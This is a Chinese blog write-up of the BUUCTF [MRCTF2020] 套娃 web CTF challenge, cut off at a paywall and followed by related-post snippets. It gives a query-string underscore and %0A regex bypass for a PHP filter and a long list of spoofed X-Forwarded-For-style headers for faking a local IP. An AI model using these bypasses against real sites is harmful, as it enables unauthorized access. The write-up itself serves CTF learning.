BUUCTF-[MRCTF2020]套娃

原创 于 2025-09-27 21:12:51 发布 · 1.1k 阅读 · 24 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #javascript #开发语言 #BUUCTF

这题目听起来就关卡就很多,事实上也不负众望....

第一关

首先F12审计一下

发现有注释代码

<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!-->

$_SERVER['QUERY_STRING']是get传参的东西

比如:https://xxxxxxx/?a=6

$_SERVER['QUERY_STRING']  =>   a=6

然后就是说这个请求里面不能有_及其url编码形式,但又要求传参b_u_p_t

问了ai发现有个方法是,在php中  .  可以被识别为  _  

那么传入b.u.p.t即可

然后是检测b.u.p.t参数内容不能等于23333但又只能是23333

Emmmm....又是问了ai(发现离不开ai了)发现/^23333$/会匹配到字符23333结束或者匹配到\n结束,那么传入23333\n即可

传参?b.u.p.t=23333%0A 即可通过

第二关

说在secrettw.php文件里面,那么就访问一下

说让用本地ip访问,那就先用BP抓包一下

然后加入万能本地请求头即可

X-Forwarded-For: 127.0.0.1
X-Forwarded-Server: localhost
X-Forwarded: 127.0.0.1
X-Forwarded: localhost
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Host: localhost
X-Host: 127.0.0.1
X-Host: localhost
X-HTTP-Host-Override: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-Addr: localhost
X-Remote-IP: 127.0.0.1
Client-IP: 127.0.0.1
Forwarded-For-IP: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For: localhost
Forwarded: 127.0.0.1
Forwarded: localhost
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forward: localhost
X-Forwarded-By: 127.0.0.1
X-Forwarded-By: localhost
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Original: localhost
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-Server: 127.0.0.1

发现没有you donot have permission语句了,说明绕过成功了

第三关

接着网页代码审计,发现有jsfuck加密内容(其实就是编码,不需要密码就可以还原)

具体内容如下:

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+
最低0.47元/天 解锁文章
臻荣
关注
BUUCTF [MRCTF2020]套娃
qq_43774856的博客
11-30 335
BUUCTF [MRCTF2020]套娃 打开链接,查看源码,如图所示 关于$_SERVER[‘QUERY_STRING’]取值, 例如: http://localhost/aaa/?p=222 $_SERVER[‘QUERY_STRING’] = “p=222”; substr_count()函数计算子串在字符串中出现的次数 PS:子串区分大小写 上述代码不能出现’_’和’%5f’,可以用‘ ’或‘.’或‘ %5F’绕过 通过get取得的参数b_u_p_t不等于23333但是正则,匹配需要匹配到2333
练[MRCTF2020]套娃
m0_66225311的博客
10-07 607
参数的`_`符号的替换,正则和强等于联合绕过,`jsfuck`编码,`bp`请求方式的转变,本地`ip`的请求头,代码审计,简单的字符串解密和加密函数之间的逆推构造,`file_get_contents`函数的绕过
[MRCTF2020]套娃 ctf web buuctf
wuyaowangchuan的博客
11-11 1286
打开之后 源代码 $query = $_SERVER['QUERY_STRING'];// if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){ echo "y.
[MRCTF2020]套娃 GET POST 读取字符串特性 伪造ip 伪协议伪造 file_get_contents()
m0_64180167的博客
09-26 780
然后我们需要绕过 第一个判断个数 又要过第二个正则 正则使用 %0A 即可。选择就是如何绕过 change 输出flag 就要开始逆向了。我们通过 GET POST 传递参数是将字符串作为数组传递。这里面就显示了 我们 在每个位置可以 选择绕过的 字符。其次就是通过 fie_get_content读取。我们要如何实现绕过呢, 下面这些方法都可以实现。运用这里我们就可以绕过许多的waf 或者拦截。第一个我们如何绕过呢 使用上面的表来桡过。这里能发现 就是进行了两个操作。那么传递了参数 做了什么操作。
[MRCTF2020]套娃
plant1234的博客
09-30 518
有判断IP要等于127.0.0.1,并且测试只有:CLIENT-IP: 127.0.0.1。并且2333传递的内容要用todat is a happy day。进行代码分析,发现对查询的字符进行过滤有,_和%5f就die。所以我们读取的flag.php要通过加密在解密。而且file读取文件是通过change解密的。然后利用 空格,.,%5F代替下划线代替。并且还要绕过23333的检测。查看源码得到flag。
BUUCTF】[MRCTF2020]套娃
pofesser的博客
01-19 3284
思考 题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧。 知识点 刷题 刷题的时候,习惯先查看robots.txt是否有敏感信息,然后查看源码。如果这个时候,都没有尝试爆目录了。 查看robots.txt无信息,查看源码。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d8ab23f032845a691d260644c24d003.png?x-oss-process=image/watermark,type_d3F5LXplbmhl
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 674
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
BUUCTF之[MRCTF2020]套娃 --- 文件包含漏洞
weixin_44632787的博客
06-27 879
BUUCTF之[MRCTF2020]套娃 题目 发现什么都没有,于是鼠标右键查看一下提示。 可以看到PHP代码 <?php //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' &
[MRCTF2020]pyFlag
wangjin7356的博客
12-28 810
https://buuoj.cn/challenges#[MRCTF2020]pyFlag 用010Editor打开三张图片,发现每张末尾都有zip的数据 按照[Secret File Part 1:]Setsuna.jpg、[Secret File Part 2:]Furan.jpg、[Secret File Part 3:]Mikui.jpg的顺序将数据拼接起来 保存为zip文件 用ARCHPR破解 hint.txt 我用各种baseXX编码把flag套娃加密了,你应该也有看出来。 但我只用了一些
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值